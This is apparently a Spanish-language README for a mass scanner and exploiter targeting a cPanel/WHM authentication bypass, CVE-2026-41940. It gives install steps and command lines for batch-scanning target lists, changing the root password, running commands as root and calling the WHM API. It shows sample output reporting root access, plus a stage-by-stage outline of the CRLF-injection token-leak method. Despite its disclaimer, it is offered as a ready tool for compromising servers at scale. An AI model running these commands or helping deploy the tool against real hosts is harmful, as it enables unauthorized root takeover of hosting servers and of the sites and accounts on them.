
cPanel/WHM CVE-2026-41940 - Escáner y explotador masivo
Escáner y Herramienta de Explotación de Bypass de Autenticación de cPanel/WHM para CVE-2026-41940
Esta herramienta se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas.
Al usar esta herramienta, aceptas que:
❗ El autor NO es responsable de ningún uso indebido, actividad ilegal, daño o consecuencia legal derivado del uso de esta herramienta.
CVE-2026-41940 es una vulnerabilidad crítica de bypass de autenticación en cPanel/WHM que podría permitir a los atacantes obtener acceso root no autorizado sin credenciales válidas.
Esta herramienta ofrece una implementación en Python para:
Python 3.7+
pip install requests urllib3
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt
# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com
# Single target
python cpanel-mass-checker.py -u https://target.com:2087
# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20
# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt
# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com
# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com
# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com
# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com
targets.txt)# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
https://example.com:2087/cpsessXXXXXXX/
| Campo | Valor |
|---|---|
| CVE | CVE-2026-41940 |
| Severidad | Crítica (CVSS 9.8) |
| Vector de Ataque | Red |
| Privilegios Requeridos |
-hostnamePara pruebas seguras y legales:
Si este proyecto te fue útil, considera darle una ⭐
| Etapa | Descripción |
|---|
| 1. Pre-autenticación | Enviar credenciales no válidas a /login/ para obtener la cookie whostmgrsession |
| 2. Inyección CRLF | Inyectar una nueva línea mediante la cabecera Authorization: Basic para filtrar el token cpsess |
| 3. Propagación del token | Activar do_token_denied para propagar el token en la caché |
| 4. Verificación | Acceder a /json-api/version para confirmar el acceso root de WHM |
| Característica | Descripción |
|---|
| 🔄 Escaneo por lotes | Escanear múltiples objetivos simultáneamente |
| 🎯 Objetivo único | Escanear un objetivo individual con salida detallada |
| 🔌 Escaneo de puertos | Escaneo automático de puertos WHM (2082, 2083, 2086, 2087) |
| 🔓 URL de sesión | Generar URL de inicio de sesión WHM de un clic |
| 💀 RCE | Ejecutar comandos del sistema como root |
| 🔑 Cambiar contraseña | Modificar la contraseña root de WHM |
| 📡 Llamadas a la API de WHM | Llamar a funciones de la API de WHM |
| 🎨 Salida con colores | Salida visual para los resultados |
| 💾 Exportar resultados | Guardar objetivos vulnerables en un archivo |
| Parámetro | Descripción | Ejemplo |
|---|
| -u | URL de un solo objetivo | -u https://target.com:2087 |
| -f | Archivo de lista de objetivos | -f targets.txt |
| -c | Concurrencia (hilos) | -c 20 |
| -o | Archivo de salida | -o results.txt |
| -hostname | Cabecera Host personalizada | -hostname cpanel.target.com |
| --scan-ports | Escanear todos los puertos WHM | --scan-ports |
| -session | Generar URL de inicio de sesión | -session |
| -passwd | Cambiar contraseña root | -passwd "NewPass123" |
| -cmd | Ejecutar comando | -cmd "id" |
| -keep | Mantener cuenta temporal | -keep |
| -api | Llamar a la API de WHM | -api listaccts |
| -api-params | Parámetros de la API | -api-params "user=root,password=123" |
| Ninguno |
| Interacción del Usuario | Ninguna |